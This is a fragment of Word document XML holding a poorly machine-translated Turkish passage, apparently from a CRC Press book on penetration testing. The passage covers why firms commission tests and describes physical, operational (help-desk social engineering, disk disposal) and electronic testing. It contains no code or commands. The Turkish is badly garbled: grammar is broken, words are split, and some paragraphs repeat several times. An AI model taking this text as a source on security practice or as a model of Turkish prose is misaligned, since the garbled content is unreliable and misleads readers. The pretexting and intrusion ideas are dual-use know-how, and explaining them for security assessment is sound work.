        <w:t>incelemek çünkü kelime “görünüş” Burada önemli. Buna ek olarak, bir işletmenin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> güvenlik durumu sürekli olarak </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>değişiyor eski, kon fi yapılanışını değişikliği değiştirir ve iş ihtiyaçları geliştikçe. “Çevre” tester inceler müşteri bir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>birinden çok farklı olabilir. Bir penetrasyon testi amaçları pazarlama için belirl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">i bir çevrenin güvenliği kanıtı kullanılırsa, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>testi onun sistemleri veya operasyonlarda bulunabilecek güvenlik tehdidine şirketin üst yönetimini uyarmak için kullanılabilir. güvenlik zayıflıkları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">olduğunu genel bilgi, ya da belirli tehditler ve güvenlik açıklarının özgül bilgi teknik personel arasında mevcut olsa da, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bu mesajı hep yönetime iletilen </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>olarak, yönetim tam olarak anlamak veya güvenlik sorunun büyüklüğünü takdir olmayabilir. sistematik yönetimi habersiz olduğu açıklarını ortaya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>penetrasyon testi var. güvenlik sorunlarının somut delillerin sunulması, bu sorunların şirkete neden olabilir hasa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">r analizi ile birlikte yönetime </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>olabilir ve bilgi güvenliği konularında daha fazla dikkat içine teşvik. Bu uyandırma görüşmesinin bir yan etkisi yönetimi tehdit ve şirket savunması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oğasını anlar kez, o tarafından ortaya çıkarılan sadece güvenlik sorunları çözmek için para ve kaynak tüketmek daha i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">stekli olabilir olabilir Test </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tarafından ek ilgiye ihtiyaç yardımcı güvenlik alanları. Bunlar yan konular genel güvenlik bilinci programı veya güvenlik teknolojisi için ek fo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irketin güvenlik orta veya ciddi sorunlar ortaya çıkarır bir penetrasyon testi zamanı etkili haklı çıkarmak için ku</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">llanılabilir ve etkili güvenlik </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>önlemleri uygulamak için gerekli gider. şirket tarafından ek ilgiye ihtiyaç testi ile ortaya çıkarılan güvenlik sorunları değil, aynı zamanda yardımc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dece ele para ve kaynak tüketmek daha istekli olabilir. Bunlar yan konular genel güvenlik bilinci programı veya g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">üvenlik teknolojisi için ek fon </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>şirketin güvenlik orta veya ciddi sorunlar ortaya çıkarır bir penetrasyon testi zamanı etkili haklı çıkarmak için kullanılabilir ve etkili güvenli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">k </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>önlemleri uygulamak için gerekli gider. şirket tarafından ek ilgiye ihtiyaç testi ile ortaya çıkarılan güvenlik sorunla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rı değil, aynı zamanda yardımcı </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sadece ele para ve kaynak tüketmek daha istekli olabilir. Bunlar yan konular genel güvenlik bilinci programı veya g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">üvenlik teknolojisi için ek fon </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>şirketin güvenlik orta veya ciddi sorunlar ortaya çıkarır bir penetrasyon testi zamanı etkili haklı çıkarmak için ku</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">llanılabilir ve etkili güvenlik </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>önlemleri uygulamak için gerekli gide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Penetrasyon Test Tür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nin tipik görüntü şirketin içine almak için havalandırma şaftı üzerinden günlerce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> bir şirketin ağı saldıran veya </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>odada oturan yüksek teknoloji bilgisayar uzmanlarından oluşan bir ekibin oldu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ğunu “gizli odaya.” iken bu may </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>farklı (ve çok nonglamorous) çeşitli şekillerde çalışır gerçekte filmlerde kullanılacak bir çekici görüntü, o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onunun fiziksel altyapısını içerir. Çoğu zaman, bir şirketin en savunmasız kısımları kendi bilgi ağı ya da</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bulunan erişim kontrollerinin teknolojisinde bulunmaz. Güvenlik problemleri konu fiziksel güvenliğ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eklinde bulunabilir. penetrasyon tester bu fiziksel zayıflıkları yararlanmaya ç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">alışacak. Örneğin, bina yeterli </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sağlar? Bina güvenlik görevlisi var mıdır ve bunlar girebilir veya bir binayı terk olarak gardiyanlar insa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nları </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">edebilirim? davetsiz misafir bir şirketin binaya kontrolsüz yürümek mümkün </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>değilse, bunla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">r aradıkları bilgilere fiziksel </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mümkün olacak. İyi bir test herkesin çalışmak ulaşıyor sabah sırasında binaya yürümek denemekt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ssas alanlar kilitli ya da başka fiziksel bariyerler tarafından korunmaktadır halinde kez içinde kontrol edin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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zaman fi le dolapları kilitli mi? o telefon ve ağ iletişim bağlantıları sonlandı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rmak tüm iletişim dolaba girmek </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nedir? Bir kişinin refakatsiz ve sorgusuz fi ce alanlarının çalışanı içine yürüyebi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lir mi? Bir binanın tüm güvenli </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>alanları yetkisiz girişlere karşı korunmalıdır. Eğer böyle değilse, test, hassas şir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ket bilgilerine sınırsız erişim mümkün olacak. </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kisiz girişlere karşı korumaları inceleyerek içermekle birlikte, penetrasyon tes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ti de yetkisiz çıkış yasaklayan </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etkinliğini incelemek olabilir. Çalışanlar tesis çıktığınızda şirket duyarlı malzemelerin hırsızlık için kontrol ediyor mu?</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sayarlar ya da diğer taşınabilir cihazlar kayıtlı ve girme ve bina çıkarken kontrol ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">iliyor mu? güvenlik görevlileri </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>türlerini aramak için değil, aynı zamanda bu prosedür önemlidir nasıl ekipman gi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">zli veya maskelenmiş edilebilir </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>üzerinde sadece eğitimli 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RC Press LLC tarafından </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">yardım masası her kullanıcıya gerektiriyorsa yardım kılınabilir önce Örneğin, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">kişisel veya gizli bilgi vermek </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>baypas çağrıyı cevaplama teknisyen için özellikle inandırıcı “Acıklı bir hikaye” an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">latarak bu kontroller? Şirketin </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>karıştırmak” veya elden önce diskleri mıknatısını ise, bu işlemler takip edilir? Değilse Hassas hangi bilgilerin test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iskler ve bilgisayarlarda nd olacak? Bir şirket birisi basitçe (yani her türlü oto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rite fiili kanıt olmadan) doğru </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>olduğunu iddia eden olabilir, bir sisteme kimlik veya şifre değişiklikleri başlatmak için gerekli yetkiye ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sıkı politikalara varsa kaldırılır, oluşturulacak bir kimlik neden olabilir veya d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eğişti? Bütün bunlar bir şirket </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>operasyonel süreçlerin karşı saldırılar vardır ve bu tekniklerin tüm bilgisayarlarda giri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ş kazanır veya hassas bilgilere </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>geçmişte başarıyla kullanılmış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 fi nal tipi elektronik testtir. Elektronik test bir organizasyonun bilgisayar s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">istemleri, ağlar, veya iletişim </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>saldırılar oluşmaktadır. Bu elle veya otomatik araçlar kullanmak suretiyle gerçekleşt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">irilebilir. elektronik testinin </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sistemler konuya tarafından kullanılan veri ağı veya iletişim imkanlar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ı sayesinde bir saldırıya karşı </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>olmadığını belirlemekt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lirli test parametrelerinin bağlı olarak, bir test bir, iki ya da testlerin her üç tip kullanab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ilir. Testin amacı, belirli bir</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sistemine erişmek ise, test bilgisayarın konsoluna erişmek veya ağ üzerinden makineyi sald</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ırmak için bir elektronik testi </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fiziksel bir penetrasyon çalışabilir. Yetkisiz personelin değerli bir araştırma verileri elde eğer testin amacı görmeyi is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opyalanan ve bu erişim günlükleri gözden kim olduğunu belirlemek verilen bilgiler izlenir veya günlüğe olup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>görmek için operasyonel test kullanabilir. Daha sonra test kiti bilgilerinin depolandığı bilgisayarlara erişmek için elektroni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çiş yapabil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Testleri Ne İşe ve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leri başarılı olmasının birkaç genel nedeni vardır. Birçoğu operasyonel bölgede bulunan; Ancak güvenlik sorunları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>çıkabilir de fi CIENCIES üç test alanlardan herhangi birind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orunları çok sayıda bilgi güvenliği ve korunması ile ilgili şirket politikaları ve prosedürleri bir şirketin çalışanlarının</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
